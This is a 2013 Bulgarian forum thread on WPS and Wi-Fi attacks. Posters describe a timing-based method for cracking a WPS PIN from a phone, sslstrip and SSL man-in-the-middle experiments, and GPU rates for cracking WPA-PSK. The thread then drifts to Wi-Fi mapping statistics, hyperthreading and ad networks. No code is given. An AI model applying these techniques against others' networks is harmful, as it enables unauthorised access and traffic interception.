3) Изпробвай няколко пъти WPS кода, който дава отклонение над threshold-а, сметни средното време, изпробвай няколко пъти код с друга първа половина, сметни средното време, ако има съществено разминаване над threshold2, най-вероятно първата половина е позната. Ако не - върви на 1)
4)..6) Същите стъпки 1)-3) с вече фиксирана първа половина от WPS кода докато разбием WPS pin-a (демек автентицираме се успешно)

Проблемите тук са че за разлика от Reaver, ние няма как да знаем точно какъв е отговора от access point-а, така че сигурност нямаме, разчитаме на разлики в timing-а. От ключово значение е как си определяме threshold стойностите и върху това трябва да се проработи повече. Това е и причината тук да нямаме гаранция за успех, за разлика от Reaver.

Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание.

Като цяло обаче не ми се вижда толкова невъзможно. Хубавото на цялата работа е че не буди никакво подозрение, тоест ако човек си цъка на телефона разни работи никой няма да си помисли, че троши wifi мрежата. Ако обаче видиш същия с лаптоп с грейнал airdump-ng примерно, определено е притеснително :)

А,да, ще се надпреварваме с батерията - в смисъл не се знае дали батерията ще падне първа или WPS кода. Моята програмка примерно разказва играта на nexus-а само за около 2-3 часа само от постоянно сканиране на близките wifi мрежи и вземане на локацията от GPS-а през 2 секунди :) Но пък би било забавно въпреки всичкото :)


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 22, 2013, 09:33
Здравей Gat3way,колкото можах прочетох с моят оскъден english твоят линк,наистина похвално е че този човек,е направил това с този куц кон(dorid),но както казва самият той софта му е много ранна фаза,и споменава че на кадъра които е постнал не се забелязва monitor mode,мисля че ако се намери достатъчно поддръжници(donors)това което би искал да види като завършена весия на неговият софт ще бъде направено.Относно това което казваш за reaver e доста новаторско,досега никой не е споменавал за този вариант,не знам дали ще се полчи под python,защото python разполога с ресурс да изчислява  доста бързо,иначе е страшно ефектно с 1 тел.както си запяш небрежно и му вземаш паролата(wep),говоря от личен опит.Не е зле да качиш твойта програма в google play,да видиш отзивите,за батерията и хакването в повечето случай специално за reaver,батерията не може да дочака заветният момент на появяването на дългоочакваната парола.
Цитат
оргинално публикувано от ApucTokpaT
Ммм ,тънък момент...
Това пък за какво...
Цитат
оргинално публикувано от  Gat3way
Рутери като например Netgear-ските, които слагат rate limit на WPS опитите също трябва да се вземат под внимание
.
Да си чувал тази екстра дали я има под tp-link

 


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 22, 2013, 10:03
 TP-link са най-уязвими от към wps атаки -не създават никакви проблеми.В последно време обаче се напълни с мрежи на m-tel ,с които имам 0 % успеваемост интересува ме някой дали може да даде качествен линк с хардуера ,който използват ,благодаря предварително! 


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 22, 2013, 10:16
Няма как да "види" Probe frame-овете без да е в monitor mode :)

А иначе далеч не съм експерт по wifi рутерите и не знам кой рутер rate limit-ва WPS и кой не. Всъщност, дори не знам кои точно Netgear-ски модели го правят и кои - не, просто съм забелязвал такова поведение. Доколкото чета не е някаква конфигурационна опция, с други думи очевидно винаги го прави когато WPS е включен. Що се отнася до TP-LINK наистина нямам идея дали се прави и кой модел от рутерите им евентуално го прави.

Ако някой случайно има Netgear и го е разцъквал, предполагам може да сподели повече информация по въпроса.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 24, 2013, 19:57
Между другото, ако на някой му е интересно малко статистика....не е особено представителна извадка, в общи линии Манастирски Ливади+малка част от центъра+част от Редута и Младост 1, горе-долу това:

http://www.gat3way.eu/poc/wifix/s_6.png


Това е разбивка в проценти колко са отворени, колко са с WEP, WPA, WPA2 или mixed mode (WPA/WPA2):

http://www.gat3way.eu/poc/wifix/s_5.png


WPA-специфична диаграма - TKIP vs CCMP vs TKIP+CCMP:

http://www.gat3way.eu/poc/wifix/s_4.png


По производител на рутера:

http://www.gat3way.eu/poc/wifix/s_3.png


Включена WPS подръжка:

http://www.gat3way.eu/poc/wifix/s_1.png


Като се помотам още, ще събера повече данни :)


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: Odido в Apr 24, 2013, 21:46
Позволих си преди да те питам, да дам линковете на скриншотовете на друго място.Струват ми се доста полезни.Едва ли ще има много значително разминаване в другите комплекси в София.Значителна разлика обаче очакавам  ще даде в бизнес центровете в сравнение с домашните рутери...


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 24, 2013, 21:49
Няма никакви проблеми. Ако имам достатъчно време, мисля, че за месец-два, app-а ще е готов и ще го пусна в Google Play безплатно (е с рекламни банери най-вероятно). Така всеки ще може да си прави такива проучвания и статистики. Ако не ми писне и ако случайно спечеля реклама повече, отколкото за една бира дневно, ще подкарам и някакъв web service, който да събира и сервира такива неща. Ама най-вероятно няма да се стигне дотам.

Иначе интересни корелации има, но е дълга тема за разговор :)


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: RealEnder в Apr 25, 2013, 12:44
@gat3way: това, което правиш подозирам, че отива към wigle.net :)
Android клиента им е с отворен код и работи доста стабилно. Кода: https://github.com/wiglenet/wigle-wifi-wardriving
Аз отдавна се каня да окастря wigle-а и да го интегрирам с http://wpa-sec.stanev.org . Добавяш си ключа вътре, пресканираш и до имената на мрежите да се появява има ли ги във wpa-sec-а, а ако ти си ги подавал, бонус - PSK-то :)


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 25, 2013, 13:07
Мхм, доста сходно като идея.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 26, 2013, 01:23
Хах, тази вечер имах повече време да си играя и най-накрая си реализирах кеширането на резултати (беше доста досадно да се изчитат от базата всички рутери и да се пречертават при всяка смяна на координатите на камерата на картата).

Но по-забавното е че направих статистиките контекстно-зависими, демек вече мога да си правя статистика на базата на текущия "изглед" на картата, следователно грубо казано мога да си вадя статистики по квартали, при правилния zoom. Резултатите ме хвърлят в размисъл. Засега малката част от Младост 1, която съм мапнал, бие всички рекорди по несигурност, WEP се ползва повече от WPA2, WPS се ползва почти на 50%. Както беше споменато, има разлики в разбивката по производители. Хм, имам странното чувство че процента рутери на TP-LINK са в корелация с цената на имотите в квартала. И да, процента на Cisco е винаги висок в бизнес-райони (центъра и бул.България), докато примерно в Редута или Младост въобще не влиза в първите 10, което е логично.

Апропо, единия от screenshot-овете дето постнах е грешен, този с каналите, имаше off-by-one бъг и всъщност 11 и 6 са най-използвани (на мен тогава ми направи впечатление, ама реших че е заради малката статистическа извадка).


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в Apr 26, 2013, 15:48
Цитат
оргинално публикувано от ApucTokpaT
TP-link са най-уязвими от към wps атаки -не създават никакви проблеми.В последно време обаче се напълни с мрежи на m-tel ,с които имам 0 % успеваемост интересува ме някой дали може да даде качествен линк с хардуера ,който използват ,благодаря предварително!

Здравей човек и мерси за инфото,моят рутер е TP-link но е доста стар,и не поддържа wireless security setup(wps),а относно m-tel мрежа досега не съм срещал да пробвам да разбия.

Gat3way,наскоро се закрастих отново да експериментирам относно сигурноста на протоколите(http,https,hsts)макар основният е http.След няколко опита с mozilla version 20.0.1(под proxy),успях без проблеми да си презапиша mail accounts от е-bay,paypal,hotmail,yahoo,bet365 като стартирам атаката чрез телефона и атакувам лаптопа си(докопах 1 msi) на порт 443(https)но gmail и twitter упорито отказват,директно ме прехвърлят на https,впрочем за twitter се показва надписа "warning try to redirect to http://www.twitter.com"но след като дам съгласието си,така и  не може да се справи да прехвърли на http,макар че основната роля на sslstrip e точно това,да задържи протокола какъвто и е подаден чрез команда(дано да не бъркам).Странното е че след като изтрия mozilla и после пак я инсталирам 1 опит е успешен,независимо от кой сайт искам да взема някакви данни.После като порових открих тези 2 мнения за gmail и twitter
Цитат
"Both use HSTS headers now, so if you're using a browser that supports them (like Chrome,or firefox),there's no opportunity for sslstrip to do anything. That output is from Twisted,and it doesn't indicate any actual problem."
и 2-то:
Цитат
"HSTS fixes this problem by informing the browser that connections to the site should always use SSL. Of course, the HSTS header can be stripped by the attacker if this is the user's first visit.Chrome attempts to limit this problem by including a hard-coded list of HSTS sites.Unfortunately this solution cannot scale to include all websites on the internet; a more workable solution can be achieved by including HSTS data inside DNS records, and accessing them securely via DNSSEC."
Накрая намерих това  https://www.owasp.org/index.php/HTTP_Strict_Transport_Security ($2)

Ти имаш някакви наблюдения основно за mozilla говоря,а и да те попитам нещо друго,не знам дали това не е в сферата на фантастиките но,ако имаше някакъв софт който само чрез да cap file извлечен чрез handshake да може да вириуализира паролата щеше да бъде невероятно,един вид да се обезмисли използването на речник

note:ако искаш прехвърли темата някъде другаде тъй-като тука говорим за протоколи а пак все заглавието на темата е  за reaver


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в Apr 26, 2013, 19:59
Ами не знам дали sslstrip може да премахва HSTS хедърите, но дори да го прави, това ще сработи само ако за пръв път отваряш сайта. Ако искаш все пак да се опиташ да mitm-ваш SSL връзки, можеш да пробваш да DNAT-ваш трафика към някое зло прокси, от сорта на това: http://crypto.stanford.edu/ssl-mitm/

Естествено, ще предоставяш самоподписани сертификати, браузърите ще реват, по-умните потребители няма да отварят twitter със самоподписан сертификат и т.н.

Тук има един такъв момент, че ако можеш да подписваш сертификати от името на trusted authority, измамата става пълна и съответно можеш да следиш трафика в чист вид в реално време, както и да го манипулираш. Това вече се е случвало примерно с едно CA с порочни практики, което продаваше на клиентите си - компании средства да слухтят служителите си, съответно повечето браузъри разкараха root CA сертификатите му от доверените си списъци. Същият ефект би имало ако компрометираш някое authority. Разбира се, вероятността това да се случи е доста ниска.

Специално за mozilla и HSTS хедърите нищо не мога да кажа.

Няма такъв софтуер, който от cap файл ей така магически да ти визуализира preshared key-а. Към момента най-доброто на което може да се надяваш е да се възползваш от специализиран хардуер за паралелна обработка (GPU или FPGA) - примерно скорост от около 1 милион опита/секунда може да се докара със система с 7 AMD Radeon HD7970-ци, на цена грубо около 10 хиляди лева. При тази скорост можеш да си позволиш доста по-сложни занимания от това просто да му засилиш речници - примерно можеш да комбинираш речници, да прилагаш разни трансформации и т.н.

Предвид че може да се каже че имам идея каква е криптографията в WPA-PSK, не мисля че в близко бъдеще ще има някакъв пробив в това отношение, извън това че хардуера става по-бърз с времето.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 09, 2013, 01:25
Да споделя занимавките ми с андроид-ската простотия, доста напреднах :)

На първо време за всеки access point по картата вече може да се изкарва доста детайлна информация - освен обичайните SSID/BSSID/Manufacturer/Channel, както и security настройките, вкарах нещо забавно. По принцип честотната лента е разделена на 14 канала, но тези канали се "презастъпват". На който не е чувал за това, нещата изглеждат така:

(http://upload.wikimedia.org/wikipedia/commons/9/93/2.4_GHz_Wi-Fi_channels_%28802.11b%2Cg_WLAN%29.png)

Сега ако се базираме на факта, че силата на сигнала намалява пропорционално на разстоянието на квадрат, както и на въпросната графика, то ние можем да сметнем ако един AP работи на някакъв канал, доколко околните AP-та му "пречат". Та в момента показвам колко е "замърсен" ефира с един recommendation да сменим канала на най-малко задръстения такъв. Получи се забавно.

Другите неща: имаме статистика и за най-използваните SSID-ове (във вид на pie chart, гадно е и е дълго да обяснявам защо реших така). Имаме филтър на база SSID (като филтъра може да игнорира lower/uppercase и да работи като "exact match" или "contains".

Вкарах нещо, наречено "security score", което определям по моя си формула. Съжалявам, но не намерих някаква меродавна формула за нещо подобно.

Допълнително съм "сканирал" около 1/4 от центъра на София плюс 2 от моловете (последното е забавно).

Wigle.NET се оказаха големи педерасти: събират информация за encryption-a на връзката, но тя идва като един низ, който те нямат никакво желание да парсват при клиента, нямат желание и да експортват такава информация в API-то си, за теб има само "отворен" и "затворен" hotspot. Това е доста дразнещо и няма как да постигна съвместимост с тяхната база. Въпреки това, този факт не им пречи да генерират статистики на база encryption, които са достъпни през уеб сайта им. Грррррр.


Какво ми остава:

* Търсене на AP по SSID от главното activity.
* Избирателно стартиране на service, който да слухти и да пълни базата, докато приложението не работи.
* По-финни настройки от сорта на "ако се движим с по-висока скорост, сканирай по-начесто" или "ако батерията е почти изтощена, изключи се" (wigle.net го прави и мисля че е добра идея).
* Статистиките да отразяват филтрите избрани от потребителя, не само текущият изглед.
* Експорт на данните в KML/CSV формат.
* Обмяна на базите през NFC/Bluetooth

Когато свърша с тези неща, ще го пусна безплатно в Google Play. Мисля обаче този път да подходя по-меркантилно към нещата (а и защото ми е интересно) и да сложа реклами в приложението. Тук нямам никаква идея, след известно четене и предишен опит, стигнах до извода, че от банери файда няма - мен поне ме дразнят ужасно много. Та идеята ми е да сложа една interstitial реклама на цял екран при затваряне на приложението. Не знам дали е добра идея. Някой дето се занимава с такива неща (n00b?) ще съм радостен ако налее акъл по въпроса. Засега съм се спрял на LeadBolt, Admob май не предлагат такива екстри за обикновени педерасти.

Иначе забавни наблюдения: не знаех че Vivacom имат толкова голяма мрежа от wifi access point-ове. Само в центъра на София са десетки, но имат доста и по кварталите.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: anrydisappear в May 09, 2013, 20:02
Здравей Gat3way,sorry че не съм писъл отдавна но нали знаеш като си купиш на старо някоя машина проблемите изкачат един след друг,нещо подобно както Дянков и валутният резерв.
Относно твоето приложение,наистина доста е различно от другите,защото в маркета поне аз подобно не видях(на моята н900,имам 2 OS droid 2.3.4)въпроса е доколко хората се интересуват от инфо относно безжичните връзки които ги заобикалят.

Иначе за ако можеш да изолираш "тъй-наречените пречещите AP"ще бъде наистина голям успех.
Но мисля че тука буквално трябва  да си прекомпилираш собствено ядро,за тези екстри.

Чудя се защо не си вземеш една нокиа н900,безтуй забелязвам че стихията ти е security testing,а този тел.(по точно таблет)има какво да ти предложи, а и има серизона подкрепа от linux ентусиасти,които да ти кажа много добре сърфират през безбрежният океан от linux world,но в крайна сметка ти имаш крайната дума.

Не знам доколко човек може да печели от development applications,защото аз не разпологам с такъв умствен капацитет,но имам 1 приятел който се занимава с правене на сайтове по поръчка(мисля че работи на php)той ми сподели че наистина не се лишава от нищо,а неговата душа граби с пълни шепи от живота.

Относно рекламата,ако наистина приложението ти добие някаква популярност(дано да се получи)те сами ще те потърсят.

В последно време,споря с 1 луд фен на тема хардуер(тука съм като индианец в макдоналдс)и софтуер,за това колко са физични и виртуални ядра в процесорите.Преди време бях срещнал едо мнение относно точно тези метафорични явления.

Та този експерт споделя че всъщност 4 ядрен процесор(говоря за мобилни такива)не са 4 ядра,а само 2,но в самият чип има повече нишки(тука вече забравих точното определение)и когато софта праща заявки за повече ресурси,тези нишки разделят ядрата на 2-реални+още 2 виртуални,специално ставаше дума за samsung galaxy s3 и samsung galaxy s4 и въобще за чипове в мобилни телефони

Знам че андроид ядрото е основано на linux kernel,(не е зле Torvalds да си поиска,обезщтетение от всички компании които го използват+iphone,тъй-като те ползват част от кода му)и тука идва забвната част.

Следователно ако софта прекалено натовари харда и тези прословути нишки започнат да функционират,това не става ли като предварително е зададено от кернела,защото кернела е софт,но без него харда е само става само за витрината.И тука стана един спор,все едно сме на предизборна кампания с този фен(мани,мани буквално ако бяхме в лице в лице направо щяхме да се смесим).

Ти човек,а и останалите в този форум сте доста навътре относно linux kernels,въобще логически като се замислиш вярно ли това(става дума за физичните и виртуалните ядра и дали в кернела е зададено по подразбиране за тези нишки)или този фен се е оказa прав че няма нищо вярно в тази теория.
Ще се радвам много,да чуя ваште мнения


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: remotex в May 09, 2013, 21:01
Накратко моите 5 ст. по въпросите за хардуера и софтуера..

Като софтуерен специалист най-напред ще п/оставя отворен въпроса за това - микрокода ($2) в един процесор софтуер ли е или хардуер? - нека хардуерните специалисти отговорят
който инак освен от БИОС може да се управлява/оправя и от ядрото чрез microcode_ctl

За виртуалните и реалните ядра/нишки - те всички са реални (изключвам мноого старите компютри, отпреди 10 г. дето не се намират вече, където  многозадачността бе изцяло софтуерна - просто много бързо превключваха между задачите и създава впечатление за едновременно изпълнение)

Напр. програмката  CPU-Z ($2) много добре показва (на най-долния ред: Selection, Cores, Threads - Total):
в моя случай: 2 - ядра, 4 - нишки, а на работа имаме едни чудовища Xeon 8 - ядра, 8 - нишки
и ядрата и нишките са си реални хардуерни обаче по-добре е когато бр. ядра е равен на бр. нишки  ;D
тогава нямаме състезаване между 2 и повече нишки за един и същи ресурс
т.е. напр. машина с 4 ядра и 4 нишки е по-бърза от такава с 2 ядра и 4 нишки - и двете ОС ще ти ги показва като 4 процесорна машина
но не много по-бърза, не е 2 пъти напр. ами около 15%
Проблемът идва оттам, че ако двете нишки които са на едно ядро поискат един и същ ресурс едната ще трябва да изчака - напр. и двете искат да събират целочислено, тук паралелизма идва когато едната иска да прави нещо друго напр. събира числа с плаваща запетая (има си отделен конвейер за това), достъп до паметта или кеша и пр. всичко което не е в конфликт с това което иска да ползва другата т.е. те не са виртуални нишките, а са си хардуерни ..хардуерните спецове май им викат конвейер(и) в процесорното ядро.

Ако искаш да тестваш пусни един биткоин миньор (аз поне с това тествам).
При мен напр. на 4 = 2 х 2 машината
с 1 ядро постига 1.0 - 1.2 МХ
с 2 и 3 ядра дига 2.0 до 2.2 МХ - тук е линейно ускорението
с 4 ядра дига едвам 2.4 МХеша/сек - тук вече не е линейно щото те всичките 4 нишки искат да ползват целочисления конвейер ама той вече е зает от другата нишка, докато на 4 = 4 х 1 очаквам линейно да скочи от 2.0 на 4.0 МХ (ама шефа не дава да пускам на сървърите 8 = 8 х 1 та да разбера  >:D)

А у дома напр. моят е 6 ядрен Феном 2 - ама прави една гадост като се усети че е много натоврен си ги сдвоява "хардуерно" т.е. вместо 6 има 3 ядра които работят малко по-бързо т.е. нали се сещаш от примера по-горе дето вади с 15% плюс, че всъщност другата нишка на същото ядро за да вдигне толкоз малко ще забави работата на първата с доста...
"хардуерно" е в кавички щото според мен микрокода може да мине за хардуер

За това ако може купувайте си процесори в които бр. ядра = бр. нишки (конвейери или както още им викат там)

П.П. Примера е с битпара щото очаквам и "вейката" да се включи  ;D
П.П.П. "вейката" е "гад3вей"-ката  :o

Може троловете вече да налазват по темата

// Малка редакция - всичко по-горе е за настолни машини! При мобилните има една подробност - там гадовете броят и комуникационния процесор - та той доскоро беше един процесор и се ползваше за управление на антената и за изчисления та имаше някои двуядрени които обаче като извадиш -1 комуникационен процесор пак си оставаш само с един за работа т.е. той комуникационния за друго не се ползва - отделен чип си е за упраление на антената (приемане, предаване, де/кодиране и т.н.)
А някои имат и: Not previously disclosed publicly, vSMP includes a fifth CPU core (the “Companion” core) built using a special low power silicon process that executes tasks at low frequency for active standby mode, music playback, and even video playback.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 09, 2013, 22:52
anrydisappear, иначе "изолиране" няма, просто някакви сметки се правят на база разстоянието между точките и канала на който излъчват. Тъй като GPS-а е доста неточен обаче (в някои случаи може да даде дори десетки метри отклонение), съответно и сметките не са идеални. Тук има два варианта - правиш сметките на място и на база сила на сигнала, това е доста по-точно, но не го правя. Или се възползваш от това че вече си мапнал точките и им знаеш параметрите - това е по-неточно, но пък работи за който и да е AP, който си мапнал, без да се налага да си в обхвата му.

Нокия няма да си взема, па макар и с нормален линукс отгоре. Също така и нямам намерение да се изхранвам с писане на мобилни приложения, имам си друга, съвсем различна работа и това е по-скоро отскорошно хоби. Тъй като нямам много идея от нещата ми е интересно. Специално нещата с рекламите още повече. Не ме интересува печалбата и не мисля че ще е особено голяма, но има друг момент. Има няколко вида реклама - примерно банери, цял екран, appwall, notification реклами и т.н. Според мен е много забавен момента кой точно вариант е най-подходящ, къде и как трябва да се позиционира така че хем да има някаква финансова файда от една страна, хем да не дразни потребителите от друга, хем да не омазва потребителския интерфейс и да не те разсейва от трета. Другото интересно е че очевидно има десетки рекламни мрежи, които имат различен модел на плащане и съответно различни печалби и всичко зависи точно как си направиш нещата. Момента с рекламата ми е почти толкова интересен, колкото момента с писането на приложението. Отначало си мислех че това е простотия и просто пльоскаш няколко реда код някъде, онова показва някаква реклама от време на време и това е, но всъщност нещата били доста по-сложни и забавни.

Андроидското ядро е линукско ядро с някакви пачове отгоре. Ако се абстрахираме от dalvik простотиите и гугълските API-та, отдолу си има един обикновен линукс - със съвсем обикновен шел (busybox) и стандартния набор системни приложения.

Самсунга мисля беше с 4-ядрен cortex-a9. Доколкото знам 4-те му ядра са си истински 4 ядра, т.е не са някаква измишльотина от рода на 2 ядра с hyperthreading или пък на AMD тъпотията с булдозерите дето уж са отделни ядра, ама си споделят L1 кешове, SIMD ALU unit-и и тем подобни неща.


Говори се че новия им таблет ще е с 8-ядрен A15/А7, там с тези big.little тъпни. big.little е ARM-ска чудесия, където примерно половината ти ядра са по-мощни и харчат повече ток, другата половина са по-слабички и по-икономични. Идеята е да се пести ток като само CPU-интензивните процеси се schedule-ват върху мощните ядра, останалите работят на по-слабите и съответно се харчи по-малко ток. За целта обаче трябва да има добра подръжка в ядрото (най-малкото task scheduler-а трябва да е "aware" за тези неща), специално в линукс това е доста отскоро и не са толкова зрели нещата.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 09, 2013, 23:14
remotex, всичко идва оттам, че в линукс 2.6 и нагоре task-а е атомарната единица на scheduler-а. Под "task" се има предвид софтуерна нишка, всяка нишка си има отделен tid, разбира се в рамките на един процес нишките споделят общо адресно пространство, но имат отделни стекове. В 2.4 не беше така, там процесът беше атомарната единица и "софтуерните" нишки се schedule-ваха не от ядрото, а от userspace библиотека.

Scheduler-а може да изпълни един task върху един логически процесор (ядро) в един момент от времето. Поради това най-логичното и нормалното е че за CPU-интензивни приложения, оптималният вариант е да се spawn-нат точно толкова нишки, колкото е броя на ядрата. Ако създадеш по-малко нишки, няма да утилизираш процесорните ядра като хората. Ако създадеш повече нишки, няма да спечелиш - понеже task scheduler-а няма как да ги schedule-не на повече логически процесора, отколкото имаш. Дори най-вероятно ще загубиш заради overhead-а от context switch-ването.

Hyperthreading-а е нагоден малко грубо в цялата картинка и изглежда почти като отделен логически процесор от софтуерна гледна точка, с една такава уговорка че единствено task-ове, които споделят едно и също адресно пространство могат да се schedule-ват едновременно върху двете "хардуерни нишки".

Причината е че hyperthreading-а е една малка хитрост. На практика това не са две отделни ядра, а просто два набора от регистри плюс някаква железария за превключване между тях. Идеята е следната: когато една програма заяви някаква памет, имаме два проблема: латентност и bandwidth. Латентността е голям проблем, особено ако заявените данни не са в кеш паметта, а във RAM-а, за времето за което ще се изчете оттам един cacheline (32 или 64 байта), процесорът би изпълнил поне няколкостотин инструкции, но няма как да го направи, защото е block-нат, чакайки memory controller-а да му достави данните. Та hyperthreading-а прави един фокус: ако се стигне до такова положение, вместо да хаби процесорно време, веднага превключва набора от регистри (включай instruction pointer регистъра) и така на практика превключва към другата задача. За да работи това обаче двете задачи трябва да имат общо адресно пространство, в противен случай трябва да се изчисти TLB кеша и това отнема доста тактове и обезсмисля задачата.


Bitcoin е идеален пример за CPU-интензивно приложение. При него всичко това важи с пълна сила. Предполагам има файда да го пуснеш с точно толкова нишки, колкото физически ядра има процесора, като въпреки наличието на hyperthreading-а, файдата от пускането на повече нишки е минимална до отрицателна.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: remotex в May 09, 2013, 23:43
gat3way поправи ме ако греша, но нас навремето ни учеха че...
напр. едно ядро с две нишки може да изпълни напълно паралелно едната нишка/конвейер целочислено събиране а другата събиране с плаваща запетая (и двете не са дълги операции подлежащи на изчакване та да се наложи превключване на контекста) т.е. не е баш като да е едното да чака другото и да са различни регистри с общ процесор, по-скоро са си два отделни конвейера - спират се само ако едния блокира даден ресурс (щото го ползва) напр. ако едната нишка е заела FPU то другата не може да го ползва или ако едната първа е заела ALU то другата ще чака т.е. само някой ресурси са икономисали - защо?
та какво му е толкова скъпото на 1 ALU че да пестят и да слагат само по едно - айде за FPU знам че е скъпо, ама тук един колега май вече сам си направи ALU верно 8 битово - очаквам и той да се включи по тази тема - зьз...

П.П. Даже си спомням навремето, че ръчно писания асемблер по-добре ги подреждахме инструкциите от оптимизиращия компилатор... общо взето гледаш докато имаш интензивни целочислени сметки да вкараш между тях и такива с плаваща запетая щото верно се изпълняваха паралелно (е или четене писане памет нещо) - ама тези неща ги вълнуват предимно тесните специалисти (разработчици на игри) най-вече


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 10, 2013, 00:30
Не мисля, поне hyperthreading-а на Intel доколкото знам не е точно така. Първо, няма два pipeline-а, има само един (обратното би използвало доста повече от площта на чипа и би излезнало скъпо). Не мисля, че има вариант при който едната "нишка" ползва FPU-то, докато другата прави целочислени операции. Доколкото знам, "презастъпването" става само когато при други обстоятелства бихме имали pipeline stall (примерно гореописания случай с четенето от паметта или пък грешно предсказан branch, където всичко от pipeline-а се discard-ва и новите инструкции се изчитат от паметта). Това в Bulldozer чиповете на AMD се вписва доста по-успешно, но там освен споделените ресурси имаме и "удвоени" такива, примерно integer ALU-тата са две копия на ядро. Ама мога и да греша за това. Това което със сигурност мога да твърдя е че няма как да schedule-неш два процеса с различни адресни пространства върху двете "хардуерни нишки" или и да го направиш, би било ужасно неефективно и ще обезсмисли цялата идея. Причината е че "мапването" на виртуална спрямо физическа памет става на базата на page таблици. Тези page таблици стоят в RAM-та и понеже често се достъпват, съответно влизат в кеша. Тъй като обаче двата процеса имат отделно адресно пространство, съответно различен мапинг, при "превключването" между тях, кеша трябва да се изпразни, в противен случай за двата процеса това което е на виртуален адрес X ще бъде съдържанието на физически адрес Y и ще настане голяма тарапана. Изчистването на кеша обаче е доста скъпа операция, защото последвал достъп до този виртуален адрес ще stall-не процесора за да се изиска първо съответния елемент от page таблицата от RAM-та (при изхвърлен кеш). Та да - на теория сигурно е възможно да се schedule-ват различни процеси. На практика, всяка операционна система би се стремяла да schedule-ва единствено нишки с общо адресно пространство, иначе не само че няма да се намаже от цялата работа, ами ще се прецакаме.

Това което помниш с ръчно-писания асемблер е поради друга причина (аз съм се сблъсквал с това с C код и SSE intrinsics, там има файда от "interlace"-ване на няколко операции върху отделен set от данни). Това няма общо с hyperthreading-а, има общо с утилизацията на pipeline-а. Изпълнението на една инструкция всъщност има доста етапи - образно казано fetch-ване от паметта, decode-ване на инструкцията, изпълнението й там където трябва да се изпълни, но истинските "етапи" са над 10. Pipelining-а "презастъпва" няколко инструкции стига да няма зависимости между тях така че да не чакаш примерно 15 такта докато свърши едната инструкция, после 15 за следващия, а да се стремиш паралелно да изпълниш колкото може повече инструкции, стига да няма конфликти. Тъй като FP и integer железариите са различни, определено уплътняваш по-добре конвейера, редувайки такива инструкции. Парадоксално, понеже конвейера е доста дълъг и някои от под-операциите стават на няколко стъпки, спокойно можеш да намажеш ако можеш примерно да изпълниш няколко сходни операции една след друга, но опериращи независимо върху различни данни. Примерно със SSE инструкциите върху повечето модерни процесори ако успееш да докараш 3 последователни SSE инструкции опериращи независимо върху различни данни, само заради по-добре уплътнения pipeline скоростта на изпълнение е горе-долу 2 пъти по-висока.


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: remotex в May 10, 2013, 01:40
Така беше навремето - един процесор, една нишка...
Добре де като казваш че железарията е различна сега не може ли същата ситуация ама с две нишки на едно ядро - едната само sse другата само целочислено, от един процес са примерно - щом като железарията е различна и конвейерите са си изчели и кеширали данните - би трябвало да може да ги смята паралелно двата конвейера - SSE и целочислено ама аз им викам FPU/ALU?
Нали и днешните имат sse
Ей ама много гледат да икономисват в последно време, ей


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: n00b в May 10, 2013, 03:19
Та идеята ми е да сложа една interstitial реклама на цял екран при затваряне на приложението. Не знам дали е добра идея. Някой дето се занимава с такива неща (n00b?) ще съм радостен ако налее акъл по въпроса. Засега съм се спрял на LeadBolt, Admob май не предлагат такива екстри за обикновени педерасти.

Т.е. търсиш рекламна мрежа с по-висок eCPM? Или някоя на цял екран?


Титла: Re: За reaver из темата „Free distributed WPA PSK cracker“
Публикувано от: gat3way в May 10, 2013, 09:27
По-скоро някоя на цял екран. Мислих по въпроса и стигнах до идеята че това май ще е най-разумното решение. Банерите за този случай ще бъдат доста дразнещи (основното activity е една карта с плотнати неща по нея, да изкачат такива неща ще е доста разсейващо и дразнещо). Имаше някакви варианти с едни popup-и, които ми се виждат още по-противни. Следващите варианти са онези гадости дето бълват notification-и, създават икони и тем подобни гадости, заради които аз лично с кеф бих разкарал приложението и бих напсувал автора му в google play. След известен размисъл стигнах до извода че най-добрият вариант е някоя реклама на цял екран, при напускане на приложението и евентуално много рядко (примерно с вероятност 1/500) при превключване от главното activity в някое от тези за статистиките, макар за последното още не знам има ли смисъл или само ще дразни. Доколкото разбирам тези реклами на цял екран докарвали доста по-висок ecpm от банерите така или иначе (все пак даваш целия екран за целта), което би компенсирало момента че ще се покаже не повече от 1-2 пъти докато приложението  работи.

Другото, което се чудих, четох някакви теории по въпроса дали е по-добре такава реклама да е при стартиране или при напускане на приложението. Някакъв пич развиваше теории че е по-добре в началото, защото имало огромен процент хора, които теглили, пускали приложението веднъж и деинсталирали без да го ползват втори път. На мен това обаче ми се вижда без особено много смисъл. Освен което мен поне доста повече би ме дразнило да видя реклама на цял екран при пускане на приложението, отколкото при напускането му. Не знам.

А иначе за рекламна мрежа още не знам...leadbolt ми се видя идейно и имат такива неща, ама четох много лоши неща за тях вчера. Това на AppBrain ми се вижда по-добра идея, ама знам ли. Предполагам може да се направи някаква схема да се комбинират два доставчика (примерно да показвам едните ако другите не могат да доставят реклама или нещо от сорта)?


